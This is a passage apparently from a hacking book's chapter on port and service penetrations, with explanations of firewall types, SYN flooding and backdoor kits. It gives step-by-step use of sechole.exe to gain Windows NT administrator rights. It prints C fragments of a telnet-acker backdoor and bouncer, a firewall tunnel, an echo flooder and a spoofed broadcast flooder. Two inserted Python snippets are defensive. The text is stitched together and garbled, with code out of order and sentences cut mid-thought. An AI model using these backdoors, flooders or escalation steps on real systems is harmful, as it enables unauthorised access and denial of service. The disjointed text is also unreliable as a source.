```c
int activepage(void)
{
/* Returns the currently selected video display page */
union REGS inreg,outreg;
/* This function assumes a COLOR display card. For use with a monochrome display card change 0xB800 to read 0xB000 */

void DBOX(int l, int t, int r, int b)

if ((key == 8) && (key_pos > 0))

/* A fatal error has occurred */
printf ("\nFATAL ERROR: %s",error);
exit(0);
}
void OPENDATA()
{
/* otherwise open it for reading/writing at end of file */
handle = open(fpath,O_RDWR,S_IWRITE);

cprintf("Address %-30.30s",rec.address);
cursor(10,3);
cprintf("Fax %-30.30s",rec.fax);
}

if (strstr(strupr(rec.address),text) != NULL) return(1);
if (strstr(strupr(rec.post),text) != NULL) return(1);
if (strstr(strupr(rec.telephone),text) != NULL) return(1);

cprintf("Searching for %s Please Wait… ",stext);
strupr(stext);
/* Locate start of file */

cprintf("Enter selection criteria");
/* Clear existing rec details */

cprintf("Enter selection criteria");
/* Clear existing rec details */
memset(&rec,0,recsize);
DISPDATA();
GETDATA(0);
textcolor(WHITE);

print("F8 Print address labels");
case 1 : /* Previous rec */
result = lseek(handle,0 - recsize * 2,SEEK_CUR);
/* If not at end of file, && !new rewind one rec */
if (result != end || ! new)
result = lseek(handle,0 - recsize,SEEK_CUR);

default: /* Amend current rec */
/* If not at end of file, && !new rewind one rec */
if (result != end || ! new)
result = lseek(handle,0 - recsize,SEEK_CUR);
```
Conclusion
At this point, we have discussed technical positions as they pertain to communication protocols and mediums. We also learned critical hacker discovery and scanning techniques used when planning attacks. Moving on, we studied pertinent internetworking knowledge that formulates a hacker's technology foundation. From there we concluded with a comprehensive introduction to the C programmer's language.
It's now time to consider all we've learned while we explore the different vulnerability penetrations used by hackers to control computers, servers, and internetworking equipment.
CHAPTER 8
Port, Socket, and Service Vulnerability Penetrations
This chapter addresses the different vulnerability penetrations used to substantiate and take advantage of breaches uncovered during the discovery and site scan phases of a security analysis, described in Chapter 5. Hackers typically use these methods to gain administrative access and to break through to, then control, computers, servers, and internetworking equipment.
To help you better understand the impact of such an attack on an inadequate security policy, we'll survey real-world penetration cases throughout this chapter.
To fully understand the material in this and the rest of the chapters in this book (and to become the hacker guru), you must have a solid background in programming, specifically how programs function internally. To that end, be sure you thoroughly understand the material in Chapter 7, "Hacker Coding Fundamentals." You may also want or need to review other programming publications offered at the publisher's Web site, www.wiley.com.
Example Case Synopsis
To begin, we'll investigate a common example of a penetration attack on a Microsoft Windows NT network. By exploiting existing Windows NT services, an application can locate a specific application programming interface (API) call in open process memory, modify the instructions in a running instance, and gain debug-level access to the system. At that point, the attacker, now connected, will have full membership rights in the Administrators group of the local NT Security Accounts Manager (SAM) database (as you may know, SAM plays a crucial role in Windows NT account authentication and security).
Let's take a closer look at this infiltration. The following describes how any normal, or nonadministrative, user on a Windows NT network can instantly gain administrative control by running a simple hacker program. The only requirements are to have a machine running Windows NT 3.51, 4.0, or 5.0 (Workstation or Server) and then to follow four simple steps:
1. Log in. Log in as any user on the machine, including the Guest account.
2. Copy files. After logging in, copy the files sechole.exe and admindll.dll onto a hard disk drive in any directory in which you have write and execute access.
3. Run Sechole.exe. Execute sechole.exe. (It is important to note that after running this program, your system might become unstable or possibly even lock up.)
4. If necessary, reboot the machine. Presto! The current nonadmin user belongs to the Windows NT Administrators group, meaning that he or she has complete administrative control over that machine.
The programs shown in this chapter are available on the CD bundled with this book.
Indeed, if this infiltration were to take place on an unprotected network server, this example could be an IT staff nightmare, especially when used with a log basher (described later in this chapter) to help conceal any trace of the attack. This particular type of penetration is commonly undertaken from within an organization or through remote access via extranets and virtual private networks (VPNs).
At this point, let's move forward to discuss other secret methods and techniques used to exploit potential security holes, both local and remote.
Backdoor Kits
In essence, a backdoor is a means and method used by hackers to gain, retain, and cover their access to an internetworking architecture (i.e., a system).
More generally, a backdoor refers to a flaw in a particular security system. Therefore, hackers often want to preserve access to systems that they have penetrated even in the face of obstacles such as new firewalls, filters, proxies, and patched vulnerabilities.
Backdoor kits branch into two distinct categories: active and passive. Active backdoors can be used by a hacker anytime he or she wishes; passive backdoor kits trigger themselves according to a predetermined time or system event. The type of backdoor a hacker selects is directly related to the security gateway architecture in place. Network security is commonly confined to the aforementioned impediments: firewalls, filters, and proxies. To simplify the options, there are two basic architectural categories, the packet filter and the proxy firewall; each has an enhanced version.
Packet Filter
The packet filter is a host or router that checks each packet against a policy or rule before routing it to the destined network and/or node through the correct interface. The most common filter policies reject ICMP, UDP, and incoming SYN/ACK packets that initiate an inward session. Very simple types of these filters can filter only on the source host, destination host, and destination port. Advanced types can also base decisions on the incoming interface, source port, and even header flags. An example of this filter type is a simple router such as any Cisco series access router or even a UNIX station with a firewall daemon. If the router is configured to pass a particular protocol, external hosts can use that protocol to establish a direct connection to internal hosts. Most routers can be programmed to produce an audit log, with features to generate alarms when hostile behavior is detected.
A problem with packet filters is that they are hard to manage; as rules become more complex, it's concomitantly easier to generate conflicting policies or to allow in unwanted packets. Hackers realize that these architectures are also known to have numerous security gaps. Regardless, packet filters do have their place, primarily as a first line of defense before a firewall. Currently, many firewalls have packet filters compiled with their kernel module or internetworking operating system (IOS).
Stateful Filter
A stateful filter is an enhanced version of a packet filter, providing the same functionality as its predecessor while also keeping track of state information (such as TCP sequence numbers). Fundamentally, a stateful filter maintains information about connections. Examples include the Cisco PIX, Checkpoint FireWall-1, and Watchguard firewall.
The stateful process is defined as the analysis of data within the lowest levels of the protocol stack to compare the current session to previous ones, for the purpose of detecting suspicious activity. Unlike
does not rely on predefined application information. Stateful inspection also takes less processing power than application-level analysis. On the downside, stateful inspection firewalls do not recognize specific applications, hence are unable to apply dissimilar rules to different applications.
Proxy Firewall
A proxy firewall host is simply a server with dual network interface cards (NICs) that has routing or packet forwarding deactivated, utilizing a proxy server daemon instead. For every application that requires passage through this gateway, software must be installed and running to proxy it through. A proxy server acts on behalf of one or more other servers, usually for screening, firewalling, caching, or a combination of these purposes.
The term gateway is often used as a synonym for proxy server. Typically, a proxy server is used within a company or enterprise to gather all Internet requests, forward them to Internet servers, receive the responses, and in turn forward them to the original requestor within the company (using a proxy agent, which acts on behalf of a user, typically accepting a connection from a user and completing a connection with a remote host or service).
Application Proxy Gateway
An application proxy gateway is the enhanced version of a proxy firewall, and like the proxy firewall, for every application that should pass through the firewall, software must be installed and running to proxy it. The difference is that the application gateway contains integrated modules that check every request and response. For example, an outgoing file transfer protocol (FTP) stream may only download data. Application gateways look at data at the application layer of the protocol stack and serve as proxies for outside users, intercepting packets and forwarding them to the application. Thus, outside users never have a direct connection to anything beyond the firewall. The fact that the firewall looks at this application information means that it can distinguish among such things as FTP and SMTP. For that reason, the application gateway provides security for each application it supports.
Most vendor security architectures contain their own unique security breaches (see Chapter 9 for more information).
Implementing a Backdoor Kit
Exploiting security breaches with backdoors, through firewall architectures, is not a simple task. Rather, it must be carefully planned to reach a successful completion. When implementing a backdoor kit, frequently, four actions take place:
• Seizing a virtual connection. This involves hijacking a remote telnet session, a VPN tunnel, or a secure-ID session.
• Planting an insider. This is a user, technician, or socially engineered (swindled) individual who installs the kit from the internal network. A much simpler and common version of this action involves spoofing email to an internal user with a remote-access Trojan attached.
• Manipulating an internal vulnerability. Most networks offer some suite of services, whether it be email, domain name resolution, or Web server access in a demilitarized zone (DMZ; the zone in front of the firewall, often not completely protected by a firewall). An attack can be made on any one of those services with a good chance of gaining access. Consider the fact that many firewalls run daemons for mail relay.
• Manipulating an external vulnerability. This involves penetrating through an external mail server, HTTP server daemon, and/or telnet service on an external boundary gateway. Most security policies are considered standard or incomplete (susceptible), thus making it possible to cause a buffer overflow or port flooding, at the very least.
Because these machines are generally monitored and checked regularly, a seasoned hacker will not attempt to put a backdoor on a machine directly connected to the firewall segment. Common targets are the internal local area network (LAN) nodes, which are usually unprotected and without regular administration.
Statistics indicate that 7 out of 10 nodes with access to the Internet, in front of or behind a firewall, have been exposed to some form of Trojan or backdoor kit. Hackers often randomly scan the Internet for these ports in search of a new victim.
Common Backdoor Methods in Use
This section describes common backdoor methods used in the basic architecture categories and their enhanced versions defined in the preceding sections.
Packet Filters
Routers and gateways acting as packet filters usually have one thing in common: the capability to telnet to and/or from the gateway for administration. A flavor of the so-called telnet-acker backdoor methodology is commonly applied to surpass these filters. This method is similar to a standard telnet daemon except that it does not formulate the TCP handshake; it uses TCP ACK packets only. Because these packets look as though they belong to a previously established connection, they are permitted to pass through. The following is an example that can be modified for this type of backdoor routine:
telnet-acker.c
```c
/*"Telnet to address/port Hit 1x [ENTER], password,"*/
/*"Host and port 23 for connection."*/
char sbuf[2048], cbuf[2048];
extern int errno;
extern char *sys_errlist[];
void reaper();

int srv_fd, rem_fd, rem_len, opt = 1;
struct sockaddr_in rem_addr, srv_addr;
bzero((char *) &rem_addr, sizeof(rem_addr));
bzero((char *) &srv_addr, sizeof(srv_addr));
if ((rem_fd = open("/dev/tty", O_RDWR)) >= 0) {
ioctl(rem_fd, TIOCNOTTY, (char *)0);

sprintf(string, "telnet bouncer ready.\n");
write(source, string, strlen(string));
#if !defined(h_addr) /* In 4.3, this is a #define */
#if defined(hpux) || defined(NeXT) || defined(ultrix) || defined(POSIX)

sprintf(string, "Found address for %s\n", hp->h_name);
write(source, string, strlen(string));
sprintf(string, "%s: bad port number\n", getport);
write(source, string, strlen(string));
write(source, string, strlen(string));
if ((dest = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror("telcli: socket");
exit(1);
}
connect(dest, (struct sockaddr *) &sa, sizeof(sa));
sprintf(string, "Connected to %s port %d… \n",

communicate(sfd,cfd) {
char *chead, *ctail, *shead, *stail;
int num, nfd, spos, cpos;
extern int errno;
if (spos < sizeof(sbuf)-1) FD_SET(sfd, &rd);
if (ctail > chead) FD_SET(sfd, &wr);
if (cpos < sizeof(cbuf)-1) FD_SET(cfd, &rd);
if (stail > shead) FD_SET(cfd, &wr);
nfd = select(256, &rd, &wr, 0, 0);

if ((num==-1) && (errno != EWOULDBLOCK)) return;

printf("Waiting for TCP connection… \n");
if((netfd = accept(sock, &listenaddr, &socklen)) == -1) {
perror("accept");

printf("%d bytes from interface\n", len);
write(netfd, buffer, len);
/* fwtunnel uses ethertap to tunnel an address
fwtunnel <host | -> <port>
the first argument is either the hostname to connect to, or, if you're the host which will be listening, a - obviously, the system inside the firewall gives the hostname, and the free syste
first, you'll need a kernel in the later 2.1 range
in the "Networking Options" section, turn on:
"Kernel/User netlink socket"
and, just below,
also, in the "Network device support" section, turn on:
"Ethertap network tap"
if those are compiled in, your kernel is set */
/* configuring the ethertap device
first, the necessary /dev files need to exist, so run:
mknod /dev/tap0 c 36 16
to get that to exist
next, you have to ifconfig the ethertap device, so pick a subnet you're going to use for that. in this example, we're going to use
the network 192.168.1.0, with one side as 192.168.1.1, and the other as 192.168.1.2… so, you'll need to do:
ifconfig tap0 192.168.1.1(or 2) mtu 1200
2.1 kernels should create the needed route automatically, so that shouldn't be a problem
*/
```
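To show why the ACK-only packets described above pass a plain packet filter but are stopped by the stateful tracking the earlier Stateful Filter section describes, here is an added Python model; it is not part of the book's code, and the hosts, ports and packets in it are constructed for the demonstration.

```python
"""Toy model: stateless packet filter versus stateful filter.

Added example, not from the book. Addresses, ports and packets are
constructed. Only the SYN and ACK flag bits matter for the comparison.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str          # source host
    sport: int        # source port
    dst: str          # destination host
    dport: int        # destination port
    flags: frozenset  # subset of {"SYN", "ACK"}
    inbound: bool     # True when arriving on the external interface


def stateless_filter(pkt: Packet) -> bool:
    """Classic rule: drop inbound connection attempts (SYN without ACK),
    let everything else through so replies to internal sessions arrive."""
    if pkt.inbound and "SYN" in pkt.flags and "ACK" not in pkt.flags:
        return False
    return True


class StatefulFilter:
    """Remembers sessions opened from inside; an inbound packet is accepted
    only when it belongs to one of them (including the SYN/ACK reply)."""

    def __init__(self):
        # (inside_host, inside_port, outside_host, outside_port)
        self.sessions = set()

    def allow(self, pkt: Packet) -> bool:
        if not pkt.inbound:
            if "SYN" in pkt.flags and "ACK" not in pkt.flags:
                self.sessions.add((pkt.src, pkt.sport, pkt.dst, pkt.dport))
            return True
        return (pkt.dst, pkt.dport, pkt.src, pkt.sport) in self.sessions


def demo():
    """Run four constructed packets through both filters.
    Returns {name: (stateless_allowed, stateful_allowed)}."""
    inside, outside = "10.0.0.5", "203.0.113.9"
    packets = [
        # legitimate session: inside host opens port 80 outside, reply comes back
        ("out_syn", Packet(inside, 40000, outside, 80, frozenset({"SYN"}), False)),
        ("in_synack", Packet(outside, 80, inside, 40000, frozenset({"SYN", "ACK"}), True)),
        # unsolicited ACK-only packet aimed at the internal telnet port
        ("rogue_ack", Packet(outside, 5555, inside, 23, frozenset({"ACK"}), True)),
        # plain inbound connection attempt
        ("in_syn", Packet(outside, 6000, inside, 23, frozenset({"SYN"}), True)),
    ]
    sf = StatefulFilter()
    return {name: (stateless_filter(p), sf.allow(p)) for name, p in packets}
```

The rogue ACK is the only case where the two filters disagree: the stateless rule passes it, while the stateful filter drops it because no inside host ever opened that session.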
Another popular and simple means for bypassing stateful filters is invisible FTP (file winftp.exe). This daemon does not show anything when it runs, as it executes the FTP service listening on port 21, which can be connected to with any FTP client. The program is usually attached to spammed email and disguised as a joke. Upon execution, complete uploading and downloading control is active to any anonymous hacker.
Proxies and Application Gateways
Most companies with security policies allow internal users to browse Web pages. A rule of thumb from the Underground is to defeat a firewall by attacking the weakest proxy or port number. Hackers use a reverse HTTP shell to exploit this standard policy, allowing access back into the internal network through this connection stream. An example of this attack method in Perl is
of ongoing concern.
Flooding
On a system whose network interface binds the TCP/IP protocol and/or is connected to the Internet via dialup or direct connection, some or all network services can be rendered unavailable when an error message such as the following appears:
"Connection has been lost or reset."
This type of error message is frequently a symptom of a malicious penetration attack known as flooding. The previous example pertains to a SYN attack, whereby hackers can target an entire machine or a specific TCP service such as HTTP (port 80) Web service. The attack is focused on the TCP protocol used by all computers on the Internet; and though it is not specific to the Windows NT operating system, we will use this OS for the purposes of this discussion.
Recall the SYN-ACK (three-way) handshake described in Chapter 1. Basically, a TCP connection request (SYN) is sent to a target or destination computer for a communication request. The source IP address in the packet is "spoofed," or replaced with an address that is not in use on the Internet (it belongs to another computer). An attacker sends numerous TCP SYNs to tie up as many resources as possible on the target computer. Upon receiving the connection request, the target computer allocates resources to handle and track this new communication session, then responds with a "SYN-ACK." In this case, the response is sent to the spoofed or nonexistent IP address. As a result, no response is received to the SYN-ACK; therefore, a default-configured Windows NT 3.5x or 4.0 computer will retransmit the SYN-ACK five times, doubling the time-out value after each retransmission. The initial time-out value is three seconds, so retries are attempted at 3, 6, 12, 24, and 48 seconds. After the last retransmission, 96 seconds are allowed to pass before the computer gives up waiting to receive a response and thus reallocates the resources that were set aside earlier. The total elapsed time that resources would be unavailable equates to approximately 189 seconds.
Figure 8.1 Revealing active connections with netstat
If you suspect that your computer is the target of a SYN attack, you can type the netstat command shown in Figure 8.1 at a command prompt to view active connections.
If a large number of connections are currently in the SYN_RECEIVED state, the system may be under attack, as shown in boldface in Figure 8.2.
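As an added example (not from the book), the following Python script applies the SYN_RECEIVED check just described to netstat -an output and computes the half-open hold time from the NT retry schedule given above; the netstat lines, addresses and alert threshold are constructed assumptions.

```python
"""Flag a possible SYN flood from "netstat -an" output.

Added example, not from the book. SAMPLE_NETSTAT is constructed; its
layout mimics the Windows NT netstat columns (Proto, Local Address,
Foreign Address, State). Threshold and addresses are assumptions.
"""
from collections import Counter

SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    192.168.1.10:80        192.168.1.50:1034      ESTABLISHED
  TCP    192.168.1.10:80        10.11.12.13:2001       SYN_RECEIVED
  TCP    192.168.1.10:80        10.11.12.14:2002       SYN_RECEIVED
  TCP    192.168.1.10:80        10.11.12.15:2003       SYN_RECEIVED
  TCP    192.168.1.10:80        10.11.12.16:2004       SYN_RECEIVED
  TCP    192.168.1.10:80        10.11.12.17:2005       SYN_RECEIVED
  TCP    192.168.1.10:80        10.11.12.18:2006       SYN_RECEIVED
  TCP    192.168.1.10:23        192.168.1.51:1055      ESTABLISHED
  TCP    192.168.1.10:139       0.0.0.0:0              LISTENING
"""


def parse_netstat(text):
    """Yield (local, foreign, state) for every TCP line; skip headers."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4 and parts[0] == "TCP":
            yield parts[1], parts[2], parts[3]


def half_open_by_port(text):
    """Count SYN_RECEIVED entries per local port."""
    counts = Counter()
    for local, _foreign, state in parse_netstat(text):
        if state == "SYN_RECEIVED":
            counts[local.rsplit(":", 1)[1]] += 1
    return counts


def suspect_syn_flood(text, threshold=5):
    """Local ports whose half-open count reaches the (assumed) threshold."""
    return sorted(p for p, n in half_open_by_port(text).items() if n >= threshold)


def nt_half_open_hold_seconds(initial=3, retransmissions=5):
    """Seconds a default NT 3.5x/4.0 stack keeps a half-open entry, per the
    text: retries at 3, 6, 12, 24, 48 s, then a final wait of twice the
    last interval (96 s) before the resources are released."""
    total, interval = 0, initial
    for _ in range(retransmissions):
        total += interval
        interval *= 2
    return total + interval
```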
A sniffer (described later) can be used to further troubleshoot the problem, and it may be necessary to contact the next-tier ISP for assistance in tracking the attacker. For most stacks, there is a limit on the number of connections that may be in the SYN_RECEIVED state; once it is reached for a given port, the target system responds with a reset. This can render the system infinitely occupied.
Figure 8.2 Revealing active connections in the SYN-REC state
System configurations and security policies must be specifically modified for protection against such attacks. Statistics indicate that some 90 percent of nodes connected to the Internet are susceptible. An example of such a flooding mechanism is echos.c (an echo flooder), shown here:
```c
struct ip *ip = (struct ip *)buf;
struct icmp *icmp = (struct icmp *)(ip + 1);
struct hostent *hp;
struct sockaddr_in dst;
int offset;
int on = 1;
bzero(buf, sizeof buf);
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) < 0) {
perror("socket");
exit(1);
}

fprintf(stderr, "%s: unknown host\n", argv[1]);
ip->ip_sum = 0; /* kernel fills in */
ip->ip_src.s_addr = 0; /* kernel fills in */
/* the checksum of all 0's is easy to compute */
for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) {
ip->ip_len = FIX(418); /* make total 65538 */
if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
sizeof dst) < 0) {
fprintf(stderr, "offset %d: ", offset); perror("sendto");
```
Figure 8.3 Ping flooding
A compiled version of this type of daemon to test flooding vulnerabilities is included as a TigerSuite module found on the CD bundled with this book. An illustration of this assembled version is shown in Figure 8.3.
A popular modifiable hacker saturation flooder, comparable to the technique just described, is shown here as a spoofed ICMP broadcast flooder called flood.c:
```c
#define IPHDRSIZE sizeof(struct iphdr)
#define ICMPHDRSIZE sizeof(struct icmphdr)
```